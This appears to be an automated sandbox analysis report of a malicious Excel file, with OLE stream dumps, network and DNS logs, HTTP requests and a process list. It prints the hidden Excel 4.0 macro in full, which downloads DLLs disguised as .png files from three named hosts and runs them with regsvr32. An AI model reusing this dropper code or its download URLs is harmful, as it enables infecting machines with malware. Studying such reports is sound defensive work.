                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . P B r u s h . . . . . P B r u s h . . . . . P B r u s h . . 9 . q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 0a 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      General
                                                                      Stream Path:\x1Ole
                                                                      File Type:data
                                                                      Stream Size:101
                                                                      Entropy:3.4182168343
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . U . . . . . . . . . . . . . . . . . . F . . . . ! . 7 . . . S h e e t ( 2 ) ! . . . . . . 1 . S . h . e . e . t . . ( . 2 . ) . ! . . . 1 . J . 5 . : . B . . 1 .
                                                                      Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 55 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 37 00 00 00 53 68 65 65 74 20 28 32 29 21 ce e1 fa e5 ea f2 20 31 00 53 00 68 00 65 00 65 00 74 00 20 00 28 00 32 00 29 00 21 00 1e 04 31 04 4a 04 35 04 3a 04 42 04 20 00 31 00
                                                                      General
                                                                      Stream Path:\x1Ole10Native
                                                                      File Type:data
                                                                      Stream Size:3072068
                                                                      Entropy:2.9569834776
                                                                      Base64 Encoded:True
                                                                      Data ASCII:@ . . . B M 6 . . . . . . . 6 . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:40 e0 2e 00 42 4d 36 e0 2e 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 20 03 00 00 01 00 18 00 00 00 00 00 00 e0 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                      Name:PVVEBZ
                                                                      Type:4
                                                                      Final:False
                                                                      Visible:False
                                                                      Protected:False
                                                                      PVVEBZ4False0Falsepre9,7,=FORMULA()=FORMULA()=FORMULA()=FORMULA("=CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0)",H13)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0)",H15)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw1.dll")",H17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0)",H19)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw2.dll")",H21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0)",H23)26,7,=GOTO(PDGLGF!D3)
                                                                      Name:PDGLGF
                                                                      Type:4
                                                                      Final:False
                                                                      Visible:False
                                                                      Protected:False
                                                                      PDGLGF4False0Falsepost4,3,=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw3.dll")",D14)=FORMULA("=RETURN()",D16)13,3,=EXEC("regsvr32 C:\Uduw\ehxw3.dll")15,3,=RETURN()
                                                                      Name:PDGLGF
                                                                      Type:4
                                                                      Final:False
                                                                      Visible:False
                                                                      Protected:False
                                                                      PDGLGF4False0Falsepre4,3,=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw3.dll")",D14)=FORMULA("=RETURN()",D16)
                                                                      Name:Btd
                                                                      Type:3
                                                                      Final:False
                                                                      Visible:False
                                                                      Protected:False
                                                                      Btd3False0Falsepost12,3,=CHAR(Fhgyk!L52)
                                                                      Name:Btd
                                                                      Type:3
                                                                      Final:False
                                                                      Visible:False
                                                                      Protected:False
                                                                      Btd3False0Falsepre12,3,=CHAR(Fhgyk!L52)
                                                                      Name:PVVEBZ
                                                                      Type:4
                                                                      Final:False
                                                                      Visible:False
                                                                      Protected:False
                                                                      PVVEBZ4False0Falsepost9,7,=FORMULA()=FORMULA()=FORMULA()=FORMULA("=CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0)",H13)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0)",H15)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw1.dll")",H17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0)",H19)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw2.dll")",H21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0)",H23)12,7,=CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0)14,7,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0)16,7,=EXEC("regsvr32 C:\Uduw\ehxw1.dll")18,7,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0)20,7,=EXEC("regsvr32 C:\Uduw\ehxw2.dll")22,7,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0)26,7,=GOTO(PDGLGF!D3)
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Apr 13, 2022 16:08:25.683748007 CEST49173443192.168.2.2231.22.4.117
                                                                      Apr 13, 2022 16:08:25.683832884 CEST4434917331.22.4.117192.168.2.22
                                                                      Apr 13, 2022 16:08:25.683964014 CEST49173443192.168.2.2231.22.4.117
                                                                      Apr 13, 2022 16:08:25.694847107 CEST49173443192.168.2.2231.22.4.117
                                                                      Apr 13, 2022 16:08:25.694915056 CEST4434917331.22.4.117192.168.2.22
                                                                      Apr 13, 2022 16:08:25.802860975 CEST4434917331.22.4.117192.168.2.22
                                                                      Apr 13, 2022 16:08:25.803271055 CEST49173443192.168.2.2231.22.4.117
                                                                      Apr 13, 2022 16:08:25.823371887 CEST49173443192.168.2.2231.22.4.117
                                                                      Apr 13, 2022 16:08:25.823404074 CEST4434917331.22.4.117192.168.2.22
                                                                      Apr 13, 2022 16:08:25.823813915 CEST4434917331.22.4.117192.168.2.22
                                                                      Apr 13, 2022 16:08:25.823899984 CEST49173443192.168.2.2231.22.4.117
                                                                      Apr 13, 2022 16:08:26.089989901 CEST49173443192.168.2.2231.22.4.117
                                                                      Apr 13, 2022 16:08:26.134196043 CEST4434917331.22.4.117192.168.2.22
                                                                      Apr 13, 2022 16:08:26.638818979 CEST4434917331.22.4.117192.168.2.22
                                                                      Apr 13, 2022 16:08:26.638957024 CEST4434917331.22.4.117192.168.2.22
                                                                      Apr 13, 2022 16:08:26.639058113 CEST49173443192.168.2.2231.22.4.117
                                                                      Apr 13, 2022 16:08:26.639100075 CEST49173443192.168.2.2231.22.4.117
                                                                      Apr 13, 2022 16:08:26.639482021 CEST49173443192.168.2.2231.22.4.117
                                                                      Apr 13, 2022 16:08:26.639522076 CEST4434917331.22.4.117192.168.2.22
                                                                      Apr 13, 2022 16:08:26.639554024 CEST49173443192.168.2.2231.22.4.117
                                                                      Apr 13, 2022 16:08:26.639612913 CEST49173443192.168.2.2231.22.4.117
                                                                      Apr 13, 2022 16:08:27.268148899 CEST49174443192.168.2.22192.185.17.132
                                                                      Apr 13, 2022 16:08:27.268199921 CEST44349174192.185.17.132192.168.2.22
                                                                      Apr 13, 2022 16:08:27.268280983 CEST49174443192.168.2.22192.185.17.132
                                                                      Apr 13, 2022 16:08:27.269045115 CEST49174443192.168.2.22192.185.17.132
                                                                      Apr 13, 2022 16:08:27.269062042 CEST44349174192.185.17.132192.168.2.22
                                                                      Apr 13, 2022 16:08:27.567006111 CEST44349174192.185.17.132192.168.2.22
                                                                      Apr 13, 2022 16:08:27.567137003 CEST49174443192.168.2.22192.185.17.132
                                                                      Apr 13, 2022 16:08:27.574062109 CEST49174443192.168.2.22192.185.17.132
                                                                      Apr 13, 2022 16:08:27.574089050 CEST44349174192.185.17.132192.168.2.22
                                                                      Apr 13, 2022 16:08:27.574388027 CEST44349174192.185.17.132192.168.2.22
                                                                      Apr 13, 2022 16:08:27.574462891 CEST49174443192.168.2.22192.185.17.132
                                                                      Apr 13, 2022 16:08:27.591192007 CEST49174443192.168.2.22192.185.17.132
                                                                      Apr 13, 2022 16:08:27.634186029 CEST44349174192.185.17.132192.168.2.22
                                                                      Apr 13, 2022 16:08:29.182924032 CEST44349174192.185.17.132192.168.2.22
                                                                      Apr 13, 2022 16:08:29.183068037 CEST49174443192.168.2.22192.185.17.132
                                                                      Apr 13, 2022 16:08:29.183773041 CEST44349174192.185.17.132192.168.2.22
                                                                      Apr 13, 2022 16:08:29.183835030 CEST44349174192.185.17.132192.168.2.22
                                                                      Apr 13, 2022 16:08:29.184253931 CEST49174443192.168.2.22192.185.17.132
                                                                      Apr 13, 2022 16:08:29.661552906 CEST49175443192.168.2.22162.241.62.76
                                                                      Apr 13, 2022 16:08:29.661657095 CEST44349175162.241.62.76192.168.2.22
                                                                      Apr 13, 2022 16:08:29.661747932 CEST49175443192.168.2.22162.241.62.76
                                                                      Apr 13, 2022 16:08:29.662199974 CEST49175443192.168.2.22162.241.62.76
                                                                      Apr 13, 2022 16:08:29.662235022 CEST44349175162.241.62.76192.168.2.22
                                                                      Apr 13, 2022 16:08:29.949445963 CEST44349175162.241.62.76192.168.2.22
                                                                      Apr 13, 2022 16:08:29.949579954 CEST49175443192.168.2.22162.241.62.76
                                                                      Apr 13, 2022 16:08:29.964890003 CEST49175443192.168.2.22162.241.62.76
                                                                      Apr 13, 2022 16:08:29.964926958 CEST44349175162.241.62.76192.168.2.22
                                                                      Apr 13, 2022 16:08:29.965326071 CEST44349175162.241.62.76192.168.2.22
                                                                      Apr 13, 2022 16:08:29.965420008 CEST49175443192.168.2.22162.241.62.76
                                                                      Apr 13, 2022 16:08:29.972403049 CEST49175443192.168.2.22162.241.62.76
                                                                      Apr 13, 2022 16:08:30.014192104 CEST44349175162.241.62.76192.168.2.22
                                                                      Apr 13, 2022 16:08:31.146747112 CEST44349175162.241.62.76192.168.2.22
                                                                      Apr 13, 2022 16:08:31.146872044 CEST44349175162.241.62.76192.168.2.22
                                                                      Apr 13, 2022 16:08:31.146892071 CEST49175443192.168.2.22162.241.62.76
                                                                      Apr 13, 2022 16:08:31.146950960 CEST49175443192.168.2.22162.241.62.76
                                                                      Apr 13, 2022 16:08:31.195751905 CEST49175443192.168.2.22162.241.62.76
                                                                      Apr 13, 2022 16:08:31.195811987 CEST44349175162.241.62.76192.168.2.22
                                                                      Apr 13, 2022 16:08:31.195836067 CEST49175443192.168.2.22162.241.62.76
                                                                      Apr 13, 2022 16:08:31.195902109 CEST49175443192.168.2.22162.241.62.76
                                                                      Apr 13, 2022 16:10:25.538781881 CEST49174443192.168.2.22192.185.17.132
                                                                      Apr 13, 2022 16:10:25.539721966 CEST49174443192.168.2.22192.185.17.132
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Apr 13, 2022 16:08:25.633239031 CEST5586853192.168.2.228.8.8.8
                                                                      Apr 13, 2022 16:08:25.672044039 CEST53558688.8.8.8192.168.2.22
                                                                      Apr 13, 2022 16:08:27.059580088 CEST4968853192.168.2.228.8.8.8
                                                                      Apr 13, 2022 16:08:27.264260054 CEST53496888.8.8.8192.168.2.22
                                                                      Apr 13, 2022 16:08:29.637124062 CEST5883653192.168.2.228.8.8.8
                                                                      Apr 13, 2022 16:08:29.654807091 CEST53588368.8.8.8192.168.2.22
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Apr 13, 2022 16:08:25.633239031 CEST192.168.2.228.8.8.80xe763Standard query (0)maramaabroo.comA (IP address)IN (0x0001)
                                                                      Apr 13, 2022 16:08:27.059580088 CEST192.168.2.228.8.8.80x4650Standard query (0)natalespatagonia.clA (IP address)IN (0x0001)
                                                                      Apr 13, 2022 16:08:29.637124062 CEST192.168.2.228.8.8.80xeef8Standard query (0)camarajocaclaudino.pb.gov.brA (IP address)IN (0x0001)
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Apr 13, 2022 16:08:25.672044039 CEST8.8.8.8192.168.2.220xe763No error (0)maramaabroo.com31.22.4.117A (IP address)IN (0x0001)
                                                                      Apr 13, 2022 16:08:27.264260054 CEST8.8.8.8192.168.2.220x4650No error (0)natalespatagonia.cl192.185.17.132A (IP address)IN (0x0001)
                                                                      Apr 13, 2022 16:08:29.654807091 CEST8.8.8.8192.168.2.220xeef8No error (0)camarajocaclaudino.pb.gov.br162.241.62.76A (IP address)IN (0x0001)
                                                                      • maramaabroo.com
                                                                      • natalespatagonia.cl
                                                                      • camarajocaclaudino.pb.gov.br
                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.224917331.22.4.117443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      TimestampkBytes transferredDirectionData
                                                                      2022-04-13 14:08:26 UTC0OUTGET /XGLCPZf6et/Cvnhfn.png HTTP/1.1
                                                                      Accept: */*
                                                                      UA-CPU: AMD64
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                      Host: maramaabroo.com
                                                                      Connection: Keep-Alive
                                                                      2022-04-13 14:08:26 UTC0INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Wed, 13 Apr 2022 14:08:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Content-Length: 0
                                                                      Connection: close
                                                                      Cache-Control: max-age=0
                                                                      Expires: Wed, 13 Apr 2022 14:08:25 GMT


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.2249174192.185.17.132443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      TimestampkBytes transferredDirectionData
                                                                      2022-04-13 14:08:27 UTC0OUTGET /w2X7dAxp/Cvnhfn.png HTTP/1.1
                                                                      Accept: */*
                                                                      UA-CPU: AMD64
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                      Host: natalespatagonia.cl
                                                                      Connection: Keep-Alive
                                                                      2022-04-13 14:08:29 UTC0INHTTP/1.1 200 OK
                                                                      Date: Wed, 13 Apr 2022 14:08:27 GMT
                                                                      Server: Apache
                                                                      Upgrade: h2,h2c
                                                                      Connection: Upgrade, close
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=UTF-8


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      2192.168.2.2249175162.241.62.76443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      TimestampkBytes transferredDirectionData
                                                                      2022-04-13 14:08:29 UTC1OUTGET /5jajRnhLV0/Cvnhfn.png HTTP/1.1
                                                                      Accept: */*
                                                                      UA-CPU: AMD64
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                      Host: camarajocaclaudino.pb.gov.br
                                                                      Connection: Keep-Alive
                                                                      2022-04-13 14:08:31 UTC1INHTTP/1.1 200 OK
                                                                      Date: Wed, 13 Apr 2022 14:08:30 GMT
                                                                      Server: Apache
                                                                      Upgrade: h2,h2c
                                                                      Connection: Upgrade, close
                                                                      Cache-Control: max-age=0
                                                                      Expires: Wed, 13 Apr 2022 14:08:30 GMT
                                                                      Vary: Accept-Encoding
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=UTF-8


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:16:08:16
                                                                      Start date:13/04/2022
                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                      Imagebase:0x13f660000
                                                                      File size:28253536 bytes
                                                                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Target ID:3
                                                                      Start time:16:08:26
                                                                      Start date:13/04/2022
                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:regsvr32 C:\Uduw\ehxw1.dll
                                                                      Imagebase:0xff460000
                                                                      File size:19456 bytes
                                                                      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Target ID:6
                                                                      Start time:16:08:29
                                                                      Start date:13/04/2022
                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:regsvr32 C:\Uduw\ehxw2.dll
                                                                      Imagebase:0xff460000
                                                                      File size:19456 bytes
                                                                      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Target ID:7
                                                                      Start time:16:08:31
                                                                      Start date:13/04/2022
                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:regsvr32 C:\Uduw\ehxw3.dll
                                                                      Imagebase:0xff460000
                                                                      File size:19456 bytes
                                                                      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      No disassembly